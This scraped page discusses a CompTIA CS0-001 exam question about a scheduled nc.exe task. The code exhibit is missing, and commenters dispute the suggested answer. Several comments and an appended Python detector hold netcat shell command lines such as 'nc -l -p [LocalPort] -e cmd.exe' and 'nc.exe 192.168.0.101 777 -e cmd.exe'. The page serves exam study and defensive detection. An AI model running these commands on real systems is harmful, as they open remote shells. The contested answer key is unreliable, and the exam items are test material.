
Exam CS0-001 topic 1 question 35 discussion

Actual exam question from CompTIA's CS0-001
Question #: 35
Topic #: 1

A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.
Given the following snippet of code:

Which of the following combinations BEST describes the situation and recommendations to be made for this situation?

  • A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to run nc.exe; recommend proceeding with the next step of removing the host from the network.
  • B. The cybersecurity analyst has discovered host 192.168.0.101 to be running the nc.exe file at 13:30 using the auto cron job remotely, there are no recommendations since this is not a threat currently.
  • C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using the nc.exe file; recommend proceeding with the next step of removing the host from the network.
  • D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.
Suggested Answer: A

Comments

Jeend
2 years, 4 months ago
Task Scheduler auto
upvoted 1 times
Kuku55
4 years, 3 months ago
Answer is D. Nc.exe is passing the argument to IPv4 address and 777 port with -e to give that IPv4 and 777 port a cmd.exe or a shell. You can verify this by using netcat or creating a shell with it.
upvoted 1 times
Acrisius
4 years, 5 months ago
I vote for A. at (time) sets the scheduled task run time. nc (ip then port) in this case 777 means connect to ip on port x. -e cmd means execute cmd.
upvoted 1 times
0xff
4 years, 7 months ago
@MagicianRecon - From the link provided the answer should be D. From the snippet, host 192.168.0.101 is opening a reverse shell which gives remote access capabilities to hackers and should be considered as a rogue device and instantly removed. Command: Listening backdoor shell on Windows: C:\>nc -l -p [LocalPort] -e cmd.exe
upvoted 1 times
MagicianRecon
4 years, 9 months ago
A is correct https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
upvoted 2 times
Blind_Hatred
4 years, 10 months ago
I think something is wrong with these questions and answers. An internal host is passing a shell to a host 192.168.0.101 (which is listening on port 777) using netcat. This is a scheduled task that runs at 13:30. Best answer that I can find is D, but I feel like I'm not getting all the information here.
upvoted 3 times
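
A defender-side check for the pattern the comments describe, a scheduled `at` job that starts nc.exe with `-e cmd.exe`. This is an added example, not part of the original thread or the exam material; the one-line log format, the sample entries and the function names are assumptions.

```python
import re
import shlex

# Constructed sample scheduler entries (the exam exhibit itself is missing from
# the page); the first reuses the host, port and time quoted in the thread.
SAMPLE_TASKS = [
    r"at 13:30 nc.exe 192.168.0.101 777 -e cmd.exe",
    r"at 02:00 C:\Windows\System32\defrag.exe C: /U",
    r"at 09:15 C:\Tools\NC.EXE -l -p 4444 -e cmd.exe",
    r"at 23:00 nc.exe 10.0.0.5 80",
]
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

def basename(token):
    """Lower-cased file name of a possibly quoted Windows or POSIX path."""
    return re.split(r"[\\/]", token.strip('"'))[-1].lower()

def analyze(line):
    """Return a finding for a scheduled netcat run that uses -e, else None."""
    tokens = shlex.split(line, posix=False)  # posix=False keeps backslashes
    idx = next((i for i, t in enumerate(tokens) if basename(t) in NETCAT_NAMES), None)
    if idx is None:
        return None
    args, opts, positional, i = tokens[idx + 1:], {}, [], 0
    while i < len(args):
        if args[i] in ("-e", "-p") and i + 1 < len(args):  # flags that take a value
            opts[args[i]] = args[i + 1]
            i += 2
        elif args[i].startswith("-"):
            opts[args[i]] = True
            i += 1
        else:
            positional.append(args[i])
            i += 1
    if "-e" not in opts:
        return None  # netcat without -e does not attach a program to the socket
    listening = "-l" in opts
    return {
        "time": tokens[1] if tokens[0].lower() == "at" and idx > 1 else None,
        "mode": "listener" if listening else "outbound",
        "peer": None if listening or not positional else positional[0],
        "port": opts.get("-p") if listening else (positional[1] if len(positional) > 1 else None),
        "program": basename(str(opts["-e"])),
    }

if __name__ == "__main__":
    for task in SAMPLE_TASKS:
        print(task, "->", analyze(task))
```

The parser only understands separately written flags (`-l -p 4444`), so combined forms such as `-lp` would need extra handling before relying on it.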
Community vote distribution: A (35%), C (25%), B (20%), Other